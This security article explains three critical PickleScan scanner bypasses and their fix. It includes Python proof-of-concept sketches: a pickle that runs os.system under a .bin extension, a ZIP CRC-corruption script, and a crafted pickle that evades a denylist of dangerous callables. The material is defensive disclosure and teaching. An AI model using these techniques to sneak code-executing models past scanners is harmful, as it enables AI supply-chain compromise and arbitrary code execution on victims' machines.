A recent in-depth security analysis has uncovered a trio of critical vulnerabilities in PickleScan, a widely adopted tool for detecting malicious content in Python pickle files and PyTorch models, casting a shadow over the integrity of the AI supply chain. With machine learning models rapidly being integrated into critical infrastructure, the security of the components that build and vet those models has become paramount. The newly discovered flaws, each carrying a CVSS score of 9.3 (critical), reveal a dangerous gap between security validation and real-world application, one that malicious actors can exploit to inject harmful code into AI systems. They show how an attacker could bypass the very tool designed to prevent such intrusions and distribute compromised models that appear safe to the scanner yet are capable of executing arbitrary commands. The situation underscores a pressing challenge in the AI security landscape: ensuring that the tools meant to protect the ecosystem are not themselves the weak link in the chain. The findings are a stark reminder that even with sophisticated defenses, subtle discrepancies in file processing can create significant security blind spots.
A Chasm Between Scanning and Execution
The core of the identified vulnerabilities lies in a fundamental and perilous discrepancy between how PickleScan inspects a file and how a machine learning framework like PyTorch ultimately processes it. This divergence creates exploitable blind spots. The first vulnerability, designated CVE-2025-10155, revolves around a simple file extension bypass. An attacker can craft a malicious raw pickle file and disguise it with a common PyTorch extension such as .bin or .pt. PickleScan, keying its handling off the file extension rather than the actual content, misjudges the file's format and fails to inspect its contents, effectively giving it a pass. PyTorch is not so easily fooled: it loads the file based on its content, executing the hidden malicious payload without warning. Another critical flaw, CVE-2025-10156, exploits differing behavior in the handling of corrupted ZIP archives. When PickleScan encounters a CRC mismatch, a sign of data corruption, it aborts the scan. PyTorch, in contrast, ignores these errors and proceeds to load the model. This allows an attacker to deliberately corrupt the checksum metadata of an archive containing a malicious model, ensuring it evades the scanner while the model remains fully functional for the ML framework, a perfect recipe for a stealthy attack. The sketches below illustrate both tricks.
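To make the extension bypass concrete, here is a minimal, self-contained sketch of the class of payload CVE-2025-10155 concerns: a pickle whose deserialization runs an attacker-chosen command, written out under a PyTorch-style extension. The class name, filename, and command are illustrative stand-ins, not code from PickleScan or PyTorch.

```python
import os
import pickle

class MaliciousPayload:
    """Illustrative payload: unpickling this object runs a shell command."""
    def __reduce__(self):
        # pickle records this as "call os.system('...')" during deserialization
        return (os.system, ("echo payload executed",))

# Serialize the raw pickle stream under a PyTorch-style extension.
with open("model.bin", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

# A scanner that dispatches on the ".bin" extension can mishandle this file,
# while a loader that goes by the actual bytes will unpickle it, running the
# command the moment the stream is deserialized.
```

The corruption trick behind CVE-2025-10156 can be sketched just as briefly. The snippet below builds a valid ZIP archive, then overwrites only the stored CRC-32 fields, leaving the entry's data intact: a checksum-verifying reader reports corruption, while a tolerant reader can still consume the unmodified bytes. The offsets follow the standard ZIP local-file-header and central-directory layouts; the filenames and the replacement checksum are illustrative.

```python
import struct
import zipfile

# Build a well-formed archive standing in for a zipped model checkpoint.
with zipfile.ZipFile("model.zip", "w") as zf:
    zf.writestr("data.pkl", b"harmless bytes standing in for a pickle stream")

# Overwrite the stored CRC-32 in the local file header (offset 14 after the
# PK\x03\x04 signature) and in the central directory entry (offset 16 after
# PK\x01\x02). The entry's actual data bytes are untouched.
with open("model.zip", "r+b") as f:
    data = f.read()
    for signature, crc_offset in ((b"PK\x03\x04", 14), (b"PK\x01\x02", 16)):
        f.seek(data.index(signature) + crc_offset)
        f.write(struct.pack("<I", 0xDEADBEEF))

# A strict reader now flags the archive as corrupt, even though the payload
# is fully intact for any reader that skips checksum verification.
with zipfile.ZipFile("model.zip") as zf:
    print(zf.testzip())  # prints "data.pkl": the recorded CRC no longer matches
```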
Patching the Gaps in AI Security
The third vulnerability, CVE-2025-10157, demonstrated a clever method for evading the tool’s built-in defenses by circumventing its module blacklist. Instead of directly referencing a flagged, dangerous callable, an attacker could reference a subclass of it reachable through an import path not on the list. This subtle redirection was enough to make PickleScan downgrade the threat level from “Dangerous” to merely “Suspicious,” a classification unlikely to trigger a critical alert, while still allowing arbitrary commands to execute during deserialization; a toy version of the bypass is sketched below. Following private disclosure of the issues on June 29, 2025, a patch addressing all three flaws was released on September 2, 2025. The recommended immediate remediation is to update PickleScan to version 0.0.31. The incident, however, brought to light systemic risks that extend beyond a single tool: it underscored the danger of over-relying on any one scanner and the urgent need for a layered, defense-in-depth security posture across the entire AI supply chain. The long-term solution promoted by security experts is to migrate away from the inherently insecure pickle format toward safer alternatives such as Safetensors, a format that rules out arbitrary code execution by design.
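A toy exact-match denylist makes the subclass bypass easy to see. The scanner below is an illustration in the spirit of PickleScan’s blacklist, not its actual implementation: the DENYLIST contents, the scan function, and the myapp.helpers.PopenSubclass import path are all hypothetical. It walks a pickle’s opcodes and flags known-dangerous (module, name) pairs; a reference to a subclass living at an unlisted path earns only the weaker “Suspicious” verdict, even though instantiating it at load time is just as dangerous.

```python
import pickletools

# Illustrative exact-match blocklist of (module, name) pairs.
DENYLIST = {("os", "system"), ("builtins", "eval"), ("subprocess", "Popen")}

def scan(pickle_bytes: bytes) -> str:
    """Toy scanner: exact-match denylist over GLOBAL opcodes."""
    verdict = "Safe"
    for opcode, arg, _pos in pickletools.genops(pickle_bytes):
        if opcode.name == "GLOBAL":
            module, _, name = str(arg).partition(" ")
            if (module, name) in DENYLIST:
                return "Dangerous"
            verdict = "Suspicious"  # unknown global: severity is downgraded
    return verdict

# A direct reference to os.system is caught ...
direct = b"cos\nsystem\n(S'id'\ntR."
print(scan(direct))    # Dangerous

# ... but a hypothetical subclass of subprocess.Popen, imported from an
# unlisted path, slips past the exact match with only a mild rating.
indirect = b"cmyapp.helpers\nPopenSubclass\n(S'id'\ntR."
print(scan(indirect))  # Suspicious
```

Safetensors, by contrast, stores only raw tensor buffers plus a JSON header, so loading a file involves no deserialization step that could execute attacker-supplied code. A minimal round trip with the safetensors package looks like this (the filename is illustrative):

```python
import torch
from safetensors.torch import save_file, load_file

# Save plain tensor data: no classes, no callables, no bytecode.
save_file({"weight": torch.zeros((2, 2))}, "model.safetensors")

# Loading parses tensor metadata and raw buffers only.
tensors = load_file("model.safetensors")
print(tensors["weight"].shape)  # torch.Size([2, 2])
```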